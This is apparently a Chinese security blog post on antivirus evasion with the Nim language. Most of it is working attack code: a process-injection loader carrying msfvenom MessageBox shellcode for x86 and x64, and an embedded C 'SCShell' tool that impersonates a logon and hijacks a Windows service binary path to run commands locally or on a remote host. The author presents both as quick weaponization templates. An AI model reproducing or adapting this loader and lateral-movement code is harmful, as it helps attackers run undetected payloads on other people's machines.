免杀探讨
早年学过汇编级的免杀,其实就是花指令的那一套东西,但是在后来实际工作中,发现安全圈根本不这么玩,各种免杀工具,语言替换(golang在安全圈我认为就是这么火的),分离免杀,隐写术免杀还都挺好使,即使到2022年,杀毒软件号称什么行为免杀,沙箱免杀的,这些工具在实际测试上依然好使。
今天记录的是nim语言的免杀能力,好吧,这就是一个纯介绍blog,语言替换的免杀能力就不说了。任何小众语种天然具备免杀能力(当然时间会磨灭一切),好了,开始我的介绍。
nim中文音译可以翻译为“尼玛的”,哈哈。这个语言满足我当初的幻想:有python的语法的静态语言,so我相信会有很多安全员喜欢它。语法风格跟python和pascal类似,但是执行效率却跟C/C++一个档次,而且跟Golang一样可以打包成平台独立的可执行文件,还能打包成Js。从官网的介绍我就知道这门语言的在免杀上的可能性(参考下golang在安全圈的发展史),但是kukuku学这门语言的时候也挺吃力,没有中文文档嘛,英文虽然有,但是大大增加了理解的难度。直到我看到一个github传送门这哥们的例子简直是救命的东西,里面有nim内存加载PE,加载shellcode,嵌入c代码,等等例子。如果还不会使用可以参考这位才俊的博客
不多说了,这东西也没法多说,上栗子吃:
一个shellcode加载器的例子:
import winim/lean
import osproc
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
# Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D
let tProcess = startProcess("notepad.exe")
tProcess.suspend() # That's handy!
defer: tProcess.close()
echo "[*] Target Process: ", tProcess.processID
let pHandle = OpenProcess(
PROCESS_ALL_ACCESS,
false,
cast[DWORD](tProcess.processID)
)
defer: CloseHandle(pHandle)
echo "[*] pHandle: ", pHandle
let rPtr = VirtualAllocEx(
pHandle,
NULL,
cast[SIZE_T](shellcode.len),
MEM_COMMIT,
PAGE_EXECUTE_READ_WRITE
)
var bytesWritten: SIZE_T
let wSuccess = WriteProcessMemory(
pHandle,
rPtr,
unsafeAddr shellcode,
cast[SIZE_T](shellcode.len),
addr bytesWritten
)
echo "[*] WriteProcessMemory: ", bool(wSuccess)
echo " \\-- bytes written: ", bytesWritten
echo ""
let tHandle = CreateRemoteThread(
pHandle,
NULL,
0,
cast[LPTHREAD_START_ROUTINE](rPtr),
NULL,
0,
NULL
)
defer: CloseHandle(tHandle)
echo "[*] tHandle: ", tHandle
echo "[+] Injected"
when defined(windows):
# https://github.com/nim-lang/Nim/wiki/Consts-defined-by-the-compiler
when defined(i386):
# ./msfvenom -p windows/messagebox -f csharp, then modified for Nim arrays
echo "[*] Running in x86 process"
var shellcode: array[272, byte] = [
byte 0xd9,0xeb,0x9b,0xd9,0x74,0x24,0xf4,0x31,0xd2,0xb2,0x77,0x31,0xc9,0x64,0x8b,
0x71,0x30,0x8b,0x76,0x0c,0x8b,0x76,0x1c,0x8b,0x46,0x08,0x8b,0x7e,0x20,0x8b,
0x36,0x38,0x4f,0x18,0x75,0xf3,0x59,0x01,0xd1,0xff,0xe1,0x60,0x8b,0x6c,0x24,
0x24,0x8b,0x45,0x3c,0x8b,0x54,0x28,0x78,0x01,0xea,0x8b,0x4a,0x18,0x8b,0x5a,
0x20,0x01,0xeb,0xe3,0x34,0x49,0x8b,0x34,0x8b,0x01,0xee,0x31,0xff,0x31,0xc0,
0xfc,0xac,0x84,0xc0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7,0xeb,0xf4,0x3b,0x7c,
0x24,0x28,0x75,0xe1,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c,0x4b,0x8b,0x5a,
0x1c,0x01,0xeb,0x8b,0x04,0x8b,0x01,0xe8,0x89,0x44,0x24,0x1c,0x61,0xc3,0xb2,
0x08,0x29,0xd4,0x89,0xe5,0x89,0xc2,0x68,0x8e,0x4e,0x0e,0xec,0x52,0xe8,0x9f,
0xff,0xff,0xff,0x89,0x45,0x04,0xbb,0x7e,0xd8,0xe2,0x73,0x87,0x1c,0x24,0x52,
0xe8,0x8e,0xff,0xff,0xff,0x89,0x45,0x08,0x68,0x6c,0x6c,0x20,0x41,0x68,0x33,
0x32,0x2e,0x64,0x68,0x75,0x73,0x65,0x72,0x30,0xdb,0x88,0x5c,0x24,0x0a,0x89,
0xe6,0x56,0xff,0x55,0x04,0x89,0xc2,0x50,0xbb,0xa8,0xa2,0x4d,0xbc,0x87,0x1c,
0x24,0x52,0xe8,0x5f,0xff,0xff,0xff,0x68,0x6f,0x78,0x58,0x20,0x68,0x61,0x67,
0x65,0x42,0x68,0x4d,0x65,0x73,0x73,0x31,0xdb,0x88,0x5c,0x24,0x0a,0x89,0xe3,
0x68,0x58,0x20,0x20,0x20,0x68,0x4d,0x53,0x46,0x21,0x68,0x72,0x6f,0x6d,0x20,
0x68,0x6f,0x2c,0x20,0x66,0x68,0x48,0x65,0x6c,0x6c,0x31,0xc9,0x88,0x4c,0x24,
0x10,0x89,0xe1,0x31,0xd2,0x52,0x53,0x51,0x52,0xff,0xd0,0x31,0xc0,0x50,0xff,
0x55,0x08]
elif defined(amd64):
# ./msfvenom -p windows/x64/messagebox -f csharp, then modified for Nim arrays
echo "[*] Running in x64 process"
var shellcode: array[295, byte] = [
byte 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
0x85,0x0f,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,
0x6c,0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,
0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00]
# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
injectCreateRemoteThread(shellcode)
嵌入C代码快速实现武器化的例子
when not defined(c):
{
.error: "Must be compiled in c mode"}
{
.emit: """
// Author: Mr.Un1k0d3r RingZer0 Team
// slightly modified to use with Nim
#include <Windows.h>
#include <stdio.h>
#define LOGON32_LOGON_NEW_CREDENTIALS 9
int SCShell(char *targetHost, char *serviceName, char *payload, char *domain, char *username, char *password) {
LPQUERY_SERVICE_CONFIGA lpqsc = NULL;
DWORD dwLpqscSize = 0;
CHAR* originalBinaryPath = NULL;
BOOL bResult = FALSE;
printf("SCShell ***\n");
if(strcmp(targetHost,"local") == 0) {
targetHost = NULL;
printf("Target is local\n");
} else {
printf("Trying to connect to %s\n", targetHost);
}
HANDLE hToken = NULL;
if(strlen(username) != 0) {
printf("Username was provided attempting to call LogonUserA\n");
bResult = LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &hToken);
if(!bResult) {
printf("LogonUserA failed %ld\n", GetLastError());
ExitProcess(0);
}
} else {
printf("Using current process context for authentication. (Pass the hash)\n");
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {
printf("OpenProcessToken failed %ld\n", GetLastError());
ExitProcess(0);
}
}
bResult = FALSE;
bResult = ImpersonateLoggedOnUser(hToken);
if(!bResult) {
printf("ImpersonateLoggedOnUser failed %ld\n", GetLastError());
ExitProcess(0);
}
SC_HANDLE schManager = OpenSCManagerA(targetHost, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
if(schManager == NULL) {
printf("OpenSCManagerA failed %ld\n", GetLastError());
ExitProcess(0);
}
printf("SC_HANDLE Manager 0x%p\n", schManager);
printf("Opening %s\n", serviceName);
SC_HANDLE schService = OpenServiceA(schManager, serviceName, SERVICE_ALL_ACCESS);
if(schService == NULL) {
CloseServiceHandle(schManager);
printf("OpenServiceA failed %ld\n", GetLastError());
ExitProcess(0);
}
printf("SC_HANDLE Service 0x%p\n", schService);
DWORD dwSize = 0;
QueryServiceConfigA(schService, NULL, 0, &dwSize);
if(dwSize) {
// This part is not critical error will not stop the program
dwLpqscSize = dwSize;
printf("LPQUERY_SERVICE_CONFIGA need 0x%08x bytes\n", dwLpqscSize);
lpqsc = GlobalAlloc(GPTR, dwSize);
bResult = FALSE;
bResult = QueryServiceConfigA(schService, lpqsc, dwLpqscSize, &dwSize);
originalBinaryPath = lpqsc->lpBinaryPathName;
printf("Original service binary path \"%s\"\n", originalBinaryPath);
}
bResult = FALSE;
bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, payload, NULL, NULL, NULL, NULL, NULL, NULL);
if(!bResult) {
printf("ChangeServiceConfigA failed to update the service path. %ld\n", GetLastError());
ExitProcess(0);
}
printf("Service path was changed to \"%s\"\n", payload);
bResult = FALSE;
bResult = StartServiceA(schService, 0, NULL);
DWORD dwResult = GetLastError();
if(!bResult && dwResult != 1053) {
printf("StartServiceA failed to start the service. %ld\n", GetLastError());
} else {
printf("Service was started\n");
}
if(dwLpqscSize) {
bResult = FALSE;
bResult = ChangeServiceConfigA(schService, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, originalBinaryPath, NULL, NULL, NULL, NULL, NULL, NULL);
if(!bResult) {
printf("ChangeServiceConfigA failed to revert the service path. %ld\n", GetLastError());
ExitProcess(0);
}
printf("Service path was restored to \"%s\"\n", originalBinaryPath);
}
GlobalFree(lpqsc);
CloseHandle(hToken);
CloseServiceHandle(schManager);
CloseServiceHandle(schService);
return 1;
}
""".}
proc SCShell(targetHost: cstring, serviceName: cstring, payload: cstring, domain: cstring, username: cstring, password: cstring): int
{
.importc: "SCShell", nodecl.}
when isMainModule:
echo "[*] Running SCShell"
echo ""
var result = SCShell(
"local",
"XblAuthManager",
r"C:\WINDOWS\system32\cmd.exe /C calc.exe",
"", # want to do it remotely? Change me!
"",
""
)
echo ""
echo "[*] Result: ", bool(result)